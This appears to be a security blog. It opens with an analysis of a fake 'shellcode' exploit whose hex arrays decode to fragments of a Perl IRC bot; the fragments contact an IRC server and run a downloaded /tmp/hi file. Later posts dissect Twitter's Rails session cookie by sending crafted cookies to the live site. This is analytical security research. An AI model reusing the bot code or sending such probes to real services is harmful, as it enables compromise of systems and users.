"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";

Throw that into vi, do a %s/^/sc = sc +/ , massage the the first and last lines and this is what python spits out:

#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
n";
            #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
            sleep 1;
       n";
            #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}sleep 1;
       sleep 1;
       ";
while (<$sockn";
            sleep 1;
       #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl

I'm pretty sure that's not what you want going on :-)

Here's the next "shellcode" block:

char fbsd_shellcode[] =
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
"\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
"\x2f\x74\x6d\x70\x2f\x68\x69\x0a";

And the printed out results:

";
while (<$sockn";
             ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
            sleep 1;
       n";
            #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="sleep 1;
       #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi

Hmm... yeah. Nice shellcode.

Twitter Session Token Fun, Part 2

2010-02-05T12:47:00.001-06:00

Recap

To recap Part 1, we have recovered what we assume is the Twitter session ID cookie, _twit_session. This cookie is a doubly-URL encoded, Base64 encoded glob that contains some ASCII strings. One of these strings points to the Ruby on Rails project. Looking through its source code and bread crumbs leads to the file ./vendor/rails/actionpack/lib/action_controller/session/cookie_store.rb. Quickly scanning this file shows a lot of cookie yumminess that is making hungry for some fresh, oven-baked chocolate chips cookies.

Also, something I did not mention before was the very high likelihood that someone else has already documented all of this information, probably in a better format. I haven't read it, if so, since this is more enjoyment on my part. If this is duplicate effort, so be it. I make no claims to originality in this post :-) And, I'm no xorl.

Analysis

There is a lot in this file. First off, notice this nice documentation:

# A message digest is included with the cookie to ensure data integrity:
    # a user cannot alter his +user_id+ without knowing the secret key
    # included in the hash. New apps are generated with a pregenerated secret
    # in config/environment.rb. Set your own for old apps you're upgrading.

Opening ./config/environment.rb does not show any pre-generated key. This is probably good, since I guess people would not change the secret. Now, if somehow this file is exposed, well, then, you got problems.

So, we got Class CookieStore, with the following def's:

initialize
call
build_cookie (private)
load_session (private)
marshal (private)
unmarshal (private)
ensure_session_key (private)
ensure_secret_secure (private)
verifier_for (private)
generate_sid (private)
persistent_session_id (private)
inject_persistent_session_id (private)
require_session_id (private)

Instead of seeing how the cookie is created, I'm interested right now how it's validated when the client sends it back. Looking at that list, unmarshal sticks out like a sore thumb. So, we can be more certain that the Base64 glob of data is a marshaled Ruby / Ruby on Rails object.

Here's the "unmarshal" method:

# Unmarshal cookie data to a hash and verify its integrity.
        def unmarshal(cookie)
          persistent_session_id!(@verifier.verify(cookie)) if cookie
        rescue ActiveSupport::MessageVerifier::InvalidSignature
          nil
        end

From what I've read, the use of "!" and "?" is just a syntactical hint of the method's behavior. Is it an action that might shoot you in the foot? Maybe use the "!" at the end to indicate this. Is the method a question? Maybe use "?" at the end. persistent_session_id! is called if cookie exists (not nil). This calls verifier.verify on cookie. verifier.verify will return an exception or load the marshalled object and return it. (See the verifier.verify analysis at the end - and I hate it that Blogger doesn't allow for same-page anchors...) The exception is caught by rescue and returns nil.

Apples to Oranges

One attack would be to somehow cause the OpenSSL call to fail. The only variable we control in this is data. Going back to the verify call, data is derived from the cookie, split at the "--" portion. Here's that cookie again:

BAh7CToMY3NyZl9pZCIlMTgwZDRhNTIyMDNjNjFlNjVkYzgyZjk5YmNiMjM1%0AODQ6EXRyYW5zX3Byb21wdDA6B2lkIiU5OGViMmNkMmEwNjhiMjQ0YjA3ZTkz%0AOTU4NDQyZjk4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6%0AOkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--155a3cf21b10246345bea30752bde45e6f841de0

So, data will be the doubly-URL encoded, Base64 encoded object to the left and digest will be the ASCII-hex 40 characters to the right. Now, if digest is omitted, generate_digest will still be called with data and the return to verify will hit the comparison, which will be false. But, what would happen if data was omitted?

On WebScarab, navigate to the "Manual Request" tab and choose a request that sends _twit_session. Blank out the data section, leaving the digest section. Click on the "Fetch Response" button and enjoy :-)

Here's the request:

GET https://twitter.com:443/ HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: _twitter_sess=--0f3a3574cd1c1abd0012a67d4cd886f53274a6f5;
Pragma: no-cache
Cache-Control: no-cache

And the response:

HTTP/1.1 500 Internal Server Error
Date: Tue, 02 Feb 2010 02:39:03 GMT
Server: hi
Status: 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, max-age=300
Set-Cookie: _twitter_sess=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1164b91ac812d853b877e93ddb612b7471bebc74; domain=.twitter.com; path=/
Expires: Tue, 02 Feb 2010 02:44:03 GMT
Vary: Accept-Encoding
X-Content-Encoding: gzip
Content-length: 1732
Connection: close

[...]

Whoops :-)

So we got InvalidSignature to raise. which sets unmarshal to nil. Now, going up the chain, unmarshal is called by load_session:

def load_session(env)
          request = Rack::Request.new(env)
          session_data = request.cookies[@key]
          data = unmarshal(session_data) || persistent_session_id!({})
          [data[:session_id], data]
        end

If unmarshal returns true, then set data to its return value. Otherwise, set data to the return value of persistent_session_id!. If you care about what persistent_session_id! does, scan all the way below. Basically, for the example above, data will be set to a new hash containing a :session_id key set to 16 bytes of random data. load_session returns an array with the :session_id key value and the data hash.

Somewhere outside of this file, something cares about data not looking like a true setup hash. I'm too lazy to track this down. My guess is that other Twitter-centric session keys are not added even though the session token is verified.

Simpler Bug
Another bug, even simpler to trigger, is in verifier.verify. We can get digest to equal the results of generate_digest(data) without knowing the secret. generate_digest expects a string. What if it got a non-string? Since data is taken from the cookie, the content will almost always be a string. But, what if we just gave it nil?

data, digest = signed_message.split("--")

For the cookie value, let's just send "--". The split above will return nil for both data and digest. Let's see what happens to Twitter in this case:

GET https://twitter.com:443/ HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: _twitter_sess=--;
Pragma: no-cache
Cache-Control: no-cache

And response:

HTTP/1.1 200 OK
Date: Fri, 05 Feb 2010 18:15:33 GMT
Server: hi
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Fri, 05 Feb 2010 18:20:33 GMT
Vary: Accept-Encoding
X-Content-Encoding: gzip
Content-length: 108
Connection: close

Status: 500 Internal Server Error

Content-Type: text/html





500 Internal Server Error

Note: I had to modify the return because Blogger sucks and interprets HTML within
the pre blocks...

This is interesting in a couple ways. One, it's a different error message than the other entry. Since the server returned a 200, it missed the Twitter custom 500 error page. Interesting, but not much to exploit.

Back in verifier.verified, the generate_digest call fails because of this:

irb
OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new('SHA1'), 'secret', nil)
TypeError: can't convert nil into String
 from (irb):61:in `hexdigest'
 from (irb):61

OpenSSL call fails because of a TypeError (nil vs. a string). Funny enough, if one sends a nil digest, the previous 500 error is sent versus this. One guess for this is that a nil vs. a nil comparison would work later on in verifier.verified.

K., enough on Twitter's session token. This was just to point out how one can go from unknown to source code, and source code to bugs just by some googling and research.

Boring Analysis (can skip :-)

verifier.verified Analysis:
verifier.verified is at ./vendor/rails/activesupport/lib/active_support/message_verifier.rb . Opening that file up reveals a class MessageVerifier with the following methods:

initialize
verify (yay!)
generate
generate_digest (private)

def verify(signed_message)
      data, digest = signed_message.split("--")
      if digest != generate_digest(data)
        raise InvalidSignature
      else
        Marshal.load(ActiveSupport::Base64.decode64(data))
      end
    end

The code splits the passed in string into two parts, data and digest. It then calls generate_digest, with the data portion. If they do not equal each other, then an exception is raised. Otherwise, the data is trusted. It is Base64 decoded and then the object is directly loaded.

We'll come back here, but let's look at generate_digest:

private
      def generate_digest(data)
        require 'openssl' unless defined?(OpenSSL)
        OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(@digest), @secret, data)
      end

The data portion of the cookie is ran through OpenSSL SHA1 HMAC. (@digest is set in the initialize method, which is set to SHA1.) Read up on RFC2104 or the Wikipedia page on HMAC for more information. It is not trivial to spoof a signature. An attacker would need to know the secret key to roll his or her own signature on a request.

So, if digest does not equal generate_digest(data), then an exception is raised. Otherwise, the Ruby native Marshal [1] class is used to load decoded object and return it as a value.

[1] http://ruby-doc.org/core/classes/Marshal.html

persistent_session_id! Analysis

def persistent_session_id!(data)
          (data ||= {}).merge!(inject_persistent_session_id(data))
        end

        def inject_persistent_session_id(data)
          requires_session_id?(data) ? { :session_id => generate_sid } : {}
        end

        def requires_session_id?(data)
          if data
            data.respond_to?(:key?) && !data.key?(:session_id)
          else
            true
          end
        end

The above made me hit ruby-doc.org to get a better understanding. From persistent_session_id!, if the passed in data hash exists, then use data; else set data to an empty hash. (An empty hash returns nil [1].) From here, merge! into the data hash the results of inject_persistent_session_id(data), which better be a hash.

From inject_persistent_session_id, call requires_session_id? with the passed in data hash. requires_session_id? will see if a session_id is required to be set. If this is required/true, then set the :session_id key in data hash to the results of generate_sid. Otherwise, set data to an empty hash.

From requires_session_id?, check the data hash to see if it's true. If not, return as true. Otherwise, check the data hash to see if it respond_to? [2] the .keys? method. If it does (which a hash should do), then check to see if data hash has a key of :session_id. If so, return false.

So, for this whole thing, since the passed in hash was empty, it has a new key created (:session_id) by generate_sid.

Here's generate_sid:

def generate_sid
          ActiveSupport::SecureRandom.hex(16)
        end

./vendor/rails/activesupport/lib/active_support/secure_random.rb

I'm not remotely qualified to discuss the merits of the pseudo-random number generator. Take a look if you care. The end result is 16 bytes (128 bits) of random data will be returned in an ASCII-hex string representation.

[1] http://ruby-doc.org/core/classes/Hash.html
[2] http://ruby-doc.org/core/classes/Object.html

Twitter Session Token Fun, Part 1

2010-02-01T13:01:00.000-06:00

Twitter Session Token

Session identifiers are fun to examine. As the wiki article states, sometimes they are random (or not so random) pieces of data that are associated somehow to some identity. Other times they actually contain information within the token itself. These latter session identifiers are fun to understand, play with, and possible exploit if a vulnerability is present.

With this, let's take a look at Twitter. I used Samurai WTF as my assessment platform, running in a VM on Mac. I use WebScarab as my man-in-the-middle proxy, with Firefox as the browser. Here's what a request / response to Twitter looks like when its session token is sent:

GET http://twitter.com:80/ HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 01 Feb 2010 17:09:21 GMT
Server: hi
X-Transaction: 1265044162-33784-6588
Status: 200 OK
ETag: "c6977efec59729f1cb0c6327c1ba573b"-gzip
Last-Modified: Mon, 01 Feb 2010 17:09:22 GMT
X-Runtime: 0.02254
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Expires: Tue, 31 Mar 1981 05:00:00 GMT
X-Revision: DEV
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMTgwZDRhNTIyMDNjNjFlNjVkYzgyZjk5YmNiMjM1%250AODQ6EXRyYW5zX3Byb21wdDA6B2lkIiU5OGViMmNkMmEwNjhiMjQ0YjA3ZTkz%250AOTU4NDQyZjk4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6%250AOkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--155a3cf21b10246345bea30752bde45e6f841de0; domain=.twitter.com; path=/
Vary: Accept-Encoding
X-Content-Encoding: gzip
Content-length: 5741
Connection: close

Look at that _twitter_sess cookie!! That looks yummy!

First thing to me is that this screams base 64. Second thing is the cookie has some URL escaped characters. (After a while, seeing %25 makes me just think of '%'. And, seeing 3D makes me think of '='. So, having two '==' at the end of a string is a common Base 64 encoding pattern.)

Opening up WebScarab's transcoder (Tools -> Transcoder), pasting the text, and running "URL decode" gives this:

BAh7CToMY3NyZl9pZCIlMTgwZDRhNTIyMDNjNjFlNjVkYzgyZjk5YmNiMjM1%0AODQ6EXRyYW5zX3Byb21wdDA6B2lkIiU5OGViMmNkMmEwNjhiMjQ0YjA3ZTkz%0AOTU4NDQyZjk4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6%0AOkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--155a3cf21b10246345bea30752bde45e6f841de0

So, the initial %25's were transcoded to %. This means the URL needs to be decoded once more:

BAh7CToMY3NyZl9pZCIlMTgwZDRhNTIyMDNjNjFlNjVkYzgyZjk5YmNiMjM1
ODQ6EXRyYW5zX3Byb21wdDA6B2lkIiU5OGViMmNkMmEwNjhiMjQ0YjA3ZTkz
OTU4NDQyZjk4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6
OkZsYXNoSGFzaHsABjoKQHVzZWR7AA==--155a3cf21b10246345bea30752bde45e6f841de0

That is some well-formed Base64 right there! Err, except for the "--155[...]" at the end. Base64 is described in RFC 1421, Section 4.3.2.4. Implementations of Base64 will add or neglect a linefeed. WebScarab wants a string with a linefeed at the 76nd character, whereas system utils such as uudecode on a Mac or FreeBSD want the linefeed at a specific count (after the 72nd character, IIRC). Here's a quick and dirty python script that just wants a full line without any linefeeds:

import base64
mystr = "BAh7CToMY3NyZl9pZCIlMTgwZDRhNTIyMDNjNjFlNjVkYzgyZjk5YmNiMjM1ODQ6EXRyYW5zX3Byb21wdDA6B2lkIiU5OGViMmNkMmEwNjhiMjQ0YjA3ZTkzOTU4NDQyZjk4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA=="
print base64.b64decode(mystr)

Notice that everything from the dashes onwards has been removed, since this is not part of the Base64 string. Running this outputs the following:

python
Python 2.5.1 (r251:54863, Jun 17 2009, 20:37:34) 
[GCC 4.0.1 (Apple Inc. build 5465)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> mystr = "BAh7CToMY3NyZl9pZCIlMTgwZDRhNTIyMDNjNjFlNjVkYzgyZjk5YmNiMjM1ODQ6EXRyYW5zX3Byb21wdDA6B2lkIiU5OGViMmNkMmEwNjhiMjQ0YjA3ZTkzOTU4NDQyZjk4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA=="
>>> print base64.b64decode(mystr)
{ :
         csrf_id"%180d4a52203c61e65dc82f99bcb23584:trans_prompt0:id"%98eb2cd2a068b244b07e93958442f982"
flashIC:'ActionController::Flash::FlashHash{:
@used{
>>>

Running this as a script, saving the output, and running my favorite file identification tool, file(1), reports this:

python b64.py > b64.bin && file b64.bin
b64.bin: data

:-( Sad Panda face...

But, look at the output from before. Happy Panda face! ;-) The first handful of hits on Google for the string "flashIC:'ActionController::Flash::FlashHash" returns references to Ruby and Ruby on Rails. Looking at the first hit, "Class
ActionController::Flash::FlashHash" is a gem (pun intended)!

Who Am I?

What do we know? We have a (possible) Twitter session identifier (inferring, since it was sent to us by Twitter and because of its name, _twitter_sess) that is a double URL encoded, Base64 blob of data that seems to relate to the Ruby on Rails, or at least Ruby, in some way. I downloaded Ruby on Rails 2.3.3 and did a quick grep for "Flash::FlashHash" in the source code. This is what I got:

setenv grepstr 'Flash::FlashHash'
find . -exec grep -l $grepstr \{\} \;
./doc/api/classes/ActionController/Flash/FlashHash.html
./doc/api/classes/ActionController/Flash.html
./doc/api/fr_class_index.html
./doc/api/fr_method_index.html
./vendor/rails/actionpack/lib/action_controller/test_process.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/lib/action_controller/test_process.rb

So, a couple HTML files and two .rb file. I'm not a Ruby coder. I briefly looked at Ruby years ago and it hurt my eyes. Python is my friend. So, I'll infer that the .rb files are Ruby source code files. These two files seem to be related to unit tests. Let's change the search string a bit:

setenv grepstr 'FlashHash'
find . -exec grep -l $grepstr \{\} \;
./doc/api/classes/ActionController/Flash/FlashHash.html
./doc/api/classes/ActionController/Flash.html
./doc/api/classes/ActionController/TestProcess.html
./doc/api/fr_class_index.html
./doc/api/fr_method_index.html
./vendor/rails/actionpack/lib/action_controller/flash.rb
./vendor/rails/actionpack/lib/action_controller/test_process.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/lib/action_controller/flash.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/lib/action_controller/test_process.rb

OK, so one more HTML file and two more .rb files. The "./vendor/rails/actionpack/lib/action_controller/flash.rb" file seems interesting. Opening that up and scanning the file quickly shows some module and class definitions. But, here's something interesting:

      def store(session, key = "flash")
        return if self.empty?
        session[key] = self
      end

This caught my eye pretty quickly. Inferring again, we have a method called "store" that wants something called "session" and "key", which is set to "flash". When I see key like this, I think of a hash data structure. The first check seems to look to see if session is empty, and if so, bail. (This implies that something else sets up session.) Then, what looks like a hash key action, sets the key called "key" to the object, "self". So, this flash object is stored in session.

Seeing that "session" is used here, let's look for that:

setenv grepstr 'session'
find . -exec grep -l $grepstr \{\} \;                ./CHANGELOG
./doc/api/classes/ActionController/Base.html
./doc/api/classes/ActionController/Cookies.html
./doc/api/classes/ActionController/Dispatcher.html
./doc/api/classes/ActionController/Filters/ClassMethods.html
./doc/api/classes/ActionController/Flash/FlashHash.html
[...]

Err, 205 documents later... That's a lot. Need a better search:

find . -name session\*.rb
./vendor/rails/actionpack/lib/action_controller/session_management.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/lib/action_controller/session_management.rb
./vendor/rails/activerecord/lib/active_record/session_store.rb
./vendor/rails/activerecord/pkg/activerecord-2.3.3/lib/active_record/session_store.rb
./vendor/rails/railties/configs/initializers/session_store.rb
./vendor/rails/railties/lib/rails_generator/generators/components/session_migration/session_migration_generator.rb

Ah, much better! That first hit, ./vendor/rails/actionpack/lib/action_controller/session_management.rb, looks good. Opening that up and scanning the documentation shows this:

    module ClassMethods
      # Set the session store to be used for keeping the session data between requests.
      # By default, sessions are stored in browser cookies (:cookie_store),
      # but you can also specify one of the other included stores (:active_record_store,
      # :mem_cache_store, or your own custom class.

For emphasis:

By default, sessions are stored in browser cookies (:cookie_store)

K. The rest of the file seems light. Let's look for cookie_store only in .rb files:

setenv grepstr 'cookie_store'
find . -name lib/\*.rb -exec grep -l $grepstr \{\} \;
./vendor/rails/actionpack/lib/action_controller/session_management.rb
./vendor/rails/actionpack/lib/action_controller.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/lib/action_controller/session_management.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/lib/action_controller.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/test/controller/session/cookie_store_test.rb
./vendor/rails/actionpack/test/controller/session/cookie_store_test.rb

Opening "./vendor/rails/actionpack/lib/action_controller.rb" and scanning seems to me to be a main file that loads other includes. Looking for "session", I come across this snippet:

  module Session
    autoload :AbstractStore, 'action_controller/session/abstract_store'
    autoload :CookieStore, 'action_controller/session/cookie_store'
    autoload :MemCacheStore, 'action_controller/session/mem_cache_store'
  end

I'm curious on the cookie store for the session. Let's take a look for cookie_store.rb.

find . -name cookie_store.rb
./vendor/rails/actionpack/lib/action_controller/session/cookie_store.rb
./vendor/rails/actionpack/pkg/actionpack-2.3.3/lib/action_controller/session/cookie_store.rb

"./vendor/rails/actionpack/lib/action_controller/session/cookie_store.rb" looks like it matches "action_controller/session/cookie_store". Open that file up, grab a drink of choice and I'll follow-up in Part 2.

Issue with FreeBSD /etc/rc.d/tmp Script

2009-12-07T14:13:00.015-06:00

FreeBSD has a minor issue with the current /etc/rc.d/tmp script. Here's the current script:


#!/bin/sh
